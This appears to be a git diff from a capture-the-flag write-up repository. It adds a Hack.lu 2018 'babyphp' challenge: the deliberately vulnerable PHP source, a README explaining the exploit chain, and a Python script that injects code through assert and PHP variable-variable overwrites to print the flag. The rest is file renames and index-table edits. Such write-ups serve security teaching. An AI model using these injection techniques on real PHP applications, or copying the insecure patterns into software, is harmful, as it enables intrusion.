0xw3bs3c
diff --git a/‎Codegate/2018/SuperMarimo/Super_Marimo renamed to ‎Codegate/2018/super_marimo/Super_Marimo b/‎Codegate/2018/SuperMarimo/Super_Marimo renamed to ‎Codegate/2018/super_marimo/Super_Marimo
diff --git a/‎Codegate/2018/SuperMarimo/libc-2.23.so renamed to ‎Codegate/2018/super_marimo/libc-2.23.so b/‎Codegate/2018/SuperMarimo/libc-2.23.so renamed to ‎Codegate/2018/super_marimo/libc-2.23.so
diff --git a/‎Hack.lu/2018/babyphp/README.md
Lines changed: 1 addition & 0 deletions b/‎Hack.lu/2018/babyphp/README.md
Lines changed: 1 addition & 0 deletions
diff --git a/‎Hack.lu/2018/babyphp/exploit.py
Lines changed: 27 additions & 0 deletions b/‎Hack.lu/2018/babyphp/exploit.py
Lines changed: 27 additions & 0 deletions
diff --git a/‎Hack.lu/2018/babyphp/program.php
Lines changed: 56 additions & 0 deletions b/‎Hack.lu/2018/babyphp/program.php
Lines changed: 56 additions & 0 deletions
diff --git a/‎MeePwn/2018/Quals/BabySandbox/baby_sandbox.py renamed to ‎MeePwn/2018/Quals/babysandbox/baby_sandbox.py b/‎MeePwn/2018/Quals/BabySandbox/baby_sandbox.py renamed to ‎MeePwn/2018/Quals/babysandbox/baby_sandbox.py
diff --git a/‎MeePwn/2018/Quals/BabySandbox/flag.txt renamed to ‎MeePwn/2018/Quals/babysandbox/flag.txt b/‎MeePwn/2018/Quals/BabySandbox/flag.txt renamed to ‎MeePwn/2018/Quals/babysandbox/flag.txt
diff --git a/‎MeePwn/2018/Quals/BabySandbox/program renamed to ‎MeePwn/2018/Quals/babysandbox/program b/‎MeePwn/2018/Quals/BabySandbox/program renamed to ‎MeePwn/2018/Quals/babysandbox/program
diff --git a/‎README.md
Lines changed: 13 additions & 12 deletions b/‎README.md
Lines changed: 13 additions & 12 deletions
@@ -0,0 +1 @@
+In `Hack.lu 2018 - BabyPHP` challenge, there is an `unsanitized user input` vulnerability which results in `unintended behaviors` as well as `code injection`. First, we can provide a `data:` URL to `file_get_contents` to return the required value. Then, we should pass `Array` in the parameter, so we force `substr` and `sha1` return `null`. Also, we can override the values of arbitrary variables using `$$` in `PHP`. Finally, we can run arbitrary code by passing arbitrary `$bb` value into `assert` in order to print `$flag`. This is an interesting `web` challenge to learn how to attack `PHP` applications.
@@ -0,0 +1,27 @@
+#!/usr/bin/env python2
+
+import requests
+import urllib
+import base64
+
+# flag{7c217708c5293a3264bb136ef1fadd6e}
+
+params = {
+    # we can provide a data: url to file_get_contents
+    'msg':  'data://text/plain;base64,{}'.format(base64.b64encode('Hello Challenge!')),
+    'key1': 1337,
+    # the dollar sing is NOT actually the $
+    'key2': '0' * 35 + '1337\xef\xbc\x84',
+    # if we provide an array, both substr and sha1 return null
+    'cc[]': '',
+    # we can override k1 with using "$$len = $hack"
+    'k1':   '2',
+    # assert evaluates the string which results in code injection
+    'bb':   'print $flag."\\n"; //'
+}
+
+url = 'https://arcade.fluxfingers.net:1819/?{}'.format(urllib.urlencode(params))
+
+with requests.get(url) as r:
+    print r.text
+
@@ -0,0 +1,56 @@
+ <?php
+
+require_once('flag.php');
+error_reporting(0);
+
+
+if(!isset($_GET['msg'])){
+    highlight_file(__FILE__);
+    die();
+}
+
+@$msg = $_GET['msg'];
+if(@file_get_contents($msg)!=="Hello Challenge!"){
+    die('Wow so rude!!!!1');
+}
+
+echo "Hello Hacker! Have a look around.\n";
+
+@$k1=$_GET['key1'];
+@$k2=$_GET['key2'];
+
+$cc = 1337;$bb = 42;
+
+if(intval($k1) !== $cc || $k1 === $cc){
+    die("lol no\n");
+}
+
+if(strlen($k2) == $bb){
+    if(preg_match('/^\d+＄/', $k2) && !is_numeric($k2)){
+        if($k2 == $cc){
+            @$cc = $_GET['cc'];
+        }
+    }
+}
+
+list($k1,$k2) = [$k2, $k1];
+
+if(substr($cc, $bb) === sha1($cc)){
+    foreach ($_GET as $lel => $hack){
+        $$lel = $hack;
+    }
+}
+
+$‮b = "2";$a="‮b";//;1=b
+
+if($$a !== $k1){
+    die("lel no\n");
+}
+
+// plz die now
+assert_options(ASSERT_BAIL, 1);
+assert("$bb == $cc");
+
+echo "Good Job ;)";
+// TODO
+// echo $flag;   
@@ -612,11 +612,11 @@
 | [N1CTF 2018](N1CTF/2018) | [network_card](N1CTF/2018/network_card) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [N1CTF 2018](N1CTF/2018) | [memsafety](N1CTF/2018/memsafety) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [N1CTF 2018](N1CTF/2018) | [beeper](N1CTF/2018/beeper) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
-| [MeePwn 2018](MeePwn/2018) | [SecureMessage](MeePwn/2018/SecureMessage) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
-| [MeePwn 2018](MeePwn/2018) | [One_Shot](MeePwn/2018/One_Shot) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
-| [MeePwn 2018](MeePwn/2018) | [House_Of_Card](MeePwn/2018/House_Of_Card) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
-| [MeePwn 2018](MeePwn/2018) | [Coin](MeePwn/2018/Coin) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
-| [MeePwn 2018](MeePwn/2018) | [BabySandbox](MeePwn/2018/BabySandbox) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
+| [MeePwn 2018 Quals](MeePwn/2018/Quals) | [SecureMessage](MeePwn/2018/Quals/SecureMessage) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
+| [MeePwn 2018 Quals](MeePwn/2018/Quals) | [One_Shot](MeePwn/2018/Quals/One_Shot) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
+| [MeePwn 2018 Quals](MeePwn/2018/Quals) | [House_Of_Card](MeePwn/2018/Quals/House_Of_Card) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
+| [MeePwn 2018 Quals](MeePwn/2018/Quals) | [Coin](MeePwn/2018/Quals/Coin) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
+| [MeePwn 2018 Quals](MeePwn/2018/Quals) | [babysandbox](MeePwn/2018/Quals/babysandbox) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [KasperskyCTF 2018](KasperskyCTF/2018) | [modcontroller](KasperskyCTF/2018/modcontroller) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [KasperskyCTF 2018](KasperskyCTF/2018) | [doubles](KasperskyCTF/2018/doubles) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [InCTF 2018](InCTF/2018) | [wARMup](InCTF/2018/wARMup) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
@@ -630,10 +630,10 @@
 | [ISITDTU 2018 Quals](ISITDTU/2018/Quals) | [dead_note_lv2](ISITDTU/2018/Quals/dead_note_lv2) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [ISITDTU 2018 Quals](ISITDTU/2018/Quals) | [dead_note_lv1](ISITDTU/2018/Quals/dead_note_lv1) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [ISITDTU 2018 Quals](ISITDTU/2018/Quals) | [babyformat](ISITDTU/2018/Quals/babyformat) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
-| [ICTF 2018](ICTF/2018) | [shelter](ICTF/2018/shelter) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
-| [ICTF 2018](ICTF/2018) | [marvelous](ICTF/2018/marvelous) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
-| [ICTF 2018](ICTF/2018) | [hero_text_adventure](ICTF/2018/hero_text_adventure) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
-| [ICTF 2018](ICTF/2018) | [fantasticiot](ICTF/2018/fantasticiot) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
+| [iCTF 2018](iCTF/2018) | [shelter](iCTF/2018/shelter) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
+| [iCTF 2018](iCTF/2018) | [marvelous](iCTF/2018/marvelous) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
+| [iCTF 2018](iCTF/2018) | [hero_text_adventure](iCTF/2018/hero_text_adventure) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
+| [iCTF 2018](iCTF/2018) | [fantasticiot](iCTF/2018/fantasticiot) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [Harekaze 2018](Harekaze/2018) | [harekaze_farm](Harekaze/2018/harekaze_farm) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [Harekaze 2018](Harekaze/2018) | [flea_attack.elf](Harekaze/2018/flea_attack.elf) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [Harekaze 2018](Harekaze/2018) | [alnush](Harekaze/2018/alnush) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
@@ -642,6 +642,7 @@
 | [HackCon 2018](HackCon/2018) | [SimpleYetElegent](HackCon/2018/SimpleYetElegent) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [HackCon 2018](HackCon/2018) | [SheSellsSeaShells](HackCon/2018/SheSellsSeaShells) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [HackCon 2018](HackCon/2018) | [BOF](HackCon/2018/BOF) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
+| [Hack.lu 2018](Hack.lu/2018) | [babyphp](Hack.lu/2018/babyphp) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [Hack.lu 2018](Hack.lu/2018) | [slot_machine](Hack.lu/2018/slot_machine) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [Hack.lu 2018](Hack.lu/2018) | [heap_hell](Hack.lu/2018/heap_hell) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [Hack.lu 2018](Hack.lu/2018) | [heap_heaven_2](Hack.lu/2018/heap_heaven_2) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
@@ -686,7 +687,7 @@
 | [Codegate 2018](Codegate/2018) | [droid.apk](Codegate/2018/droid.apk) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [Codegate 2018](Codegate/2018) | [cpu](Codegate/2018/cpu) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [Codegate 2018](Codegate/2018) | [Zoo](Codegate/2018/Zoo) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
-| [Codegate 2018](Codegate/2018) | [Super_Marimo](Codegate/2018/Super_Marimo) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
+| [Codegate 2018](Codegate/2018) | [super_marimo](Codegate/2018/super_marimo) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [Codegate 2018](Codegate/2018) | [RedVelvet](Codegate/2018/RedVelvet) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [Codegate 2018](Codegate/2018) | [Melong](Codegate/2018/Melong) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [Codegate 2018](Codegate/2018) | [Boom](Codegate/2018/Boom) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
@@ -752,8 +753,8 @@
 | [0CTF 2018 Quals](0CTF/2018/Quals) | [MathGame](0CTF/2018/Quals/MathGame) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [0CTF 2018 Quals](0CTF/2018/Quals) | [HeapStormII](0CTF/2018/Quals/HeapStormII) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [0CTF 2018 Quals](0CTF/2018/Quals) | [BlackHoleTheory](0CTF/2018/Quals/BlackHoleTheory) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
-| [0CTF 2018 Quals](0CTF/2018/Quals) | [BabyStack](0CTF/2018/Quals/BabyStack) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
-| [0CTF 2018 Quals](0CTF/2018/Quals) | [BabyHeap](0CTF/2018/Quals/BabyHeap) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
+| [0CTF 2018 Quals](0CTF/2018/Quals) | [babystack](0CTF/2018/Quals/babystack) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
+| [0CTF 2018 Quals](0CTF/2018/Quals) | [babyheap](0CTF/2018/Quals/babyheap) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [0CTF 2018 Finals](0CTF/2018/Finals) | [vtp](0CTF/2018/Finals/vtp) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [0CTF 2018 Finals](0CTF/2018/Finals) | [pemu](0CTF/2018/Finals/pemu) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
 | [0CTF 2018 Finals](0CTF/2018/Finals) | [keen_of_glory](0CTF/2018/Finals/keen_of_glory) | [CTFtime Event](https://ctftime.org/event/)<br>[CTFtime Writeups](https://ctftime.org/task/) |
Original file line number	Diff line number	Diff line change
`@@ -0,0 +1 @@`
	`1`	+In `Hack.lu 2018 - BabyPHP` challenge, there is an `unsanitized user input` vulnerability which results in `unintended behaviors` as well as `code injection`. First, we can provide a `data:` URL to `file_get_contents` to return the required value. Then, we should pass `Array` in the parameter, so we force `substr` and `sha1` return `null`. Also, we can override the values of arbitrary variables using `$$` in `PHP`. Finally, we can run arbitrary code by passing arbitrary `$bb` value into `assert` in order to print `$flag`. This is an interesting `web` challenge to learn how to attack `PHP` applications.